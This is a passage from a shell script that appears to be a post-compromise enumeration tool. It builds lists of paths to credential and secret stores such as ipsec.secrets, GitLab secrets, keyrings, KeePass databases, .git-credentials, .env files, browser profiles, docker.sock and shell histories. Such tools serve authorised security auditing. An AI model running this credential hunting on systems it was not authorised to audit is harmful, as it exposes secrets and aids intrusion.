"$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.erlang\.cookie$" | sort | uniq | head -n 70) - PSTORAGE_GMV_AUTH=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "gvm-tools\.conf$" | sort | uniq | head -n 70) - PSTORAGE_IPSEC=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "ipsec\.secrets$|ipsec\.conf$" | sort | uniq | head -n 70) - PSTORAGE_IRSSI=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.irssi$" | sort | uniq | head -n 70) - PSTORAGE_KEYRING=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "keyrings$|.*\.keyring$|.*\.keystore$|.*\.jks$" | sort | uniq | head -n 70) - PSTORAGE_FILEZILLA=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "filezilla$|filezilla\.xml$|recentservers\.xml$" | sort | uniq | head -n 70) - PSTORAGE_BACKUP_MANAGER=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "storage\.php$|database\.php$" | sort | uniq | head -n 70) - PSTORAGE_SPLUNK=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "passwd$" | sort | uniq | head -n 70) - PSTORAGE_GITLAB=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -v -E '/lib' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "secrets\.yml$|gitlab\.yml$|gitlab\.rm$" | sort | uniq | head -n 70) - PSTORAGE_PGP_GPG=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -v -E 'README.gnupg' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.pgp$|.*\.gpg$|.*\.gnupg$" | sort | uniq | head -n 70) - PSTORAGE_CACHE_VI=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.swp$|.*\.viminfo$" | sort | uniq | head -n 70) - PSTORAGE_DOCKER=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "docker\.socket$|docker\.sock$|Dockerfile$|docker-compose\.yml$" | sort | uniq | head -n 70) - PSTORAGE_FIREFOX=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^" | grep -E "\.mozilla$|Firefox$" | sort | uniq | head -n 70) - PSTORAGE_CHROME=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^" | grep -E "google-chrome$|Chrome$" | sort | uniq | head -n 70) - PSTORAGE_OPERA=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^" | grep -E "com\.operasoftware\.Opera$" | sort | uniq | head -n 70) - PSTORAGE_SAFARI=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^" | grep -E "Safari$" | sort | uniq | head -n 70) - PSTORAGE_AUTOLOGIN=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "autologin$|autologin\.conf$" | sort | uniq | head -n 70) - PSTORAGE_FASTCGI=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "fastcgi_params$" | sort | uniq | head -n 70) - PSTORAGE_SNMP=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "snmpd\.conf$" | sort | uniq | head -n 70) - PSTORAGE_PYPIRC=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.pypirc$" | sort | uniq | head -n 70) - PSTORAGE_POSTFIX=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "postfix$" | sort | uniq | head -n 70) - PSTORAGE_CLOUDFLARE=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.cloudflared$" | sort | uniq | head -n 70) - PSTORAGE_HISTORY=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\..*_history\..*$" | sort | uniq | head -n 70) - PSTORAGE_HTTP_CONF=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "httpd\.conf$" | sort | uniq | head -n 70) - PSTORAGE_HTPASSWD=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.htpasswd$" | sort | uniq | head -n 70) - PSTORAGE_LDAPRC=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.ldaprc$" | sort | uniq | head -n 70) - PSTORAGE_ENV=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.env$" | sort | uniq | head -n 70) - PSTORAGE_MSMTPRC=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.msmtprc$" | sort | uniq | head -n 70) - PSTORAGE_INFLUXDB=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "influxdb\.conf$" | sort | uniq | head -n 70) - PSTORAGE_ZABBIX=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "zabbix_server\.conf$|zabbix_agentd\.conf$|zabbix$" | sort | uniq | head -n 70) - PSTORAGE_GITHUB=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.github$|\.gitconfig$|\.git-credentials$|\.git$" | sort | uniq | head -n 70) - PSTORAGE_SVN=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "\.svn$" | sort | uniq | head -n 70) - PSTORAGE_KEEPASS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.kdbx$|KeePass\.config.*$|KeePass\.ini$|KeePass\.enforced.*$" | sort | uniq | head -n 70) - PSTORAGE_FTP=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*\.ftpconfig$|ffftp\.ini$|ftp\.ini$|ftp\.config$|sites\.ini$|wcx_ftp\.ini$|winscp\.ini$|ws_ftp\.ini$" | sort | uniq | head -n 70) - PSTORAGE_BIND=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/var|^/usr|^/etc" | grep -E "bind$" | sort | uniq | head -n 70) - PSTORAGE_SEEDDMS=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E 